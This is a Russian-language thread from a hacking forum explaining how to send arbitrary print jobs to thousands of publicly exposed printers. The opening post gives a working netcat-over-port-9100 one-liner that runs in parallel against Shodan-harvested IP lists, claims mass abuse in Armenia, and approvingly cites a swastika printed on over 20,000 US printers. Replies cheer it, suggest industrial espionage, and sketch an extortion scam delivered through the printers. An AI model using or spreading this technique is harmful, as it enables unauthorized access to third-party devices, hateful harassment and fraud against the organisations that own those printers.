• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Как взломать тысячи принтеров в РА (в.СНГ+РФ тоже работает) и распечатать всё, что захочешь

A'LonE

Участник
Реакции
28
0 руб.
Страница Вконтакте
Привет [VISITOR][/VISITOR], Казалось бы, кто присваивает принтерам публичные IP адреса? Но я недавно нашел интересный скрипт, который позволяет распечатывать все, что угодно на принтерах с публичными IP. Впервые при помощи него распечатали свастику на 20+ тыс. принтеров в США. Я же решил побаловаться с принтерами в РА, подробности и сам скрипт в продолжении.

841b01721e734ab4700c1a322c106893.jpg

Код:

cat /tmp/armenianips | parallel —jobs 40 ‘cat armenia.ps | netcat -q 0 {} 9100’

«armenia.ps»
— изображение в формате PostScript, которое нужно напечатать
«armenianips»
— это IP адреса принтеров, найденные в Shodan (черный поисковик, примеры поиска в Shodan).

Удалось найти всего около 4 тысяч принтеров (РА + пару соседних стран), на которые я и
отправил послание. Cамо послание на VLMI публиковать не буду по этическим соображениям, как и список IP адресов, но механизм сбора, думаю, понятен. Данная статья не является призывом к действию и не содержит никакого вредоносного кода, однако заставляет задуматься над безопасностью публично доступных данных и о возможных последствиях.

Способы защиты очевидны — не присваивайте принтерам публичные IP адреса, если в этом нет крайней необходимости.

Как видно, похожие действия могут вызвать существенный общественный резонанс: Статья Washington Post, NY Times, IB Times смотря что печатать.

Последнее редактирование:

StyliSh

< Style Crazy >

StyliSh

< Style Crazy >
Эксперт
Реакции
641
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
Пожалуй спрячу, пока новореги не начали в принтерах члены рисовать
Для просмотра содержимого вам необходимо авторизоваться.

Sergbat1

Black Dragon

Sergbat1

Black Dragon
Резидент
Реакции
198
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
Для новичков может сойдет.

A'LonE

Участник
Реакции
28
0 руб.
Страница Вконтакте
Для новичков может сойдет.
Да?, А как взломивают профи?, Не через IP и Kali Linux что ли?, Или ты как профессионал можешь взломать
Бесполезная тема, не несёт смысловой нагрузки. Новости читаю как будто.
Тема довольно полезная, просто надо чуть ум для понимание

Miron_T31

Местный
Реакции
160
0 руб.
Через каккю систем их ломать?

Tor11

Местный
Реакции
158
0 руб.
Страница Вконтакте
Впервые при помощи него распечатали свастику на 20+ тыс. принтеров в США.
Прям сходу-Годно! Лайк!
Я как только отправил сообщение, открыл твой профиль, чекнул твой вк и сразу все стало ясно.
Чо мне удалять лайк что ле? :(

Artur Virabyan
Дорогие девушки если вам что-то во мне не нравится то идите на хуй
Правильно! Они не актуальны!

12_7.jpg

yarr

CVE-2020

yarr

CVE-2020
Резидент
Реакции
444
0 руб.
Как на этом заработать? Или так, для развлечения тема
Хуясе, для развлечения. Ты знаешь, что до недавнего времени у многих организаций были подобные косяки? Представь сливать так информацию у конкурентов, были случаи уже. Главное найти тот самый принтер). Тема про пром. шпионаж.

bug0

Местный
Реакции
181
0 руб.
Распечатать такое: "Ваша компания взломана, все движения по счетах, вся внутренняя документация выложена на сайте "сайт.сом"" Люди заходят на сайт и видят "Сайт с данными компаний", для доступа к сайту заплатите 100$.
Никого не призываю к действию. Используйте для своей безопасности и безопасности ваших компаний.

Mr_VVoodman

Резидент
Реакции
278
0 руб.
Надо будет его установить попробовать, правда меня бесит то, что нельзя иметь более 4 основных дисков.
1) Винда
2) Бэкапы и файлы
3) Debian
4) Xubuntu
И мне придётся выбирать, чего мне лишиться

Tommy0414

Злой, но справедливый

Tommy0414

Злой, но справедливый
Эксперт
Реакции
680
0 руб.
Telegram
ОХУЕННЫЙ источник трафика куда-угодно!!!!!!!!!

Сверху Снизу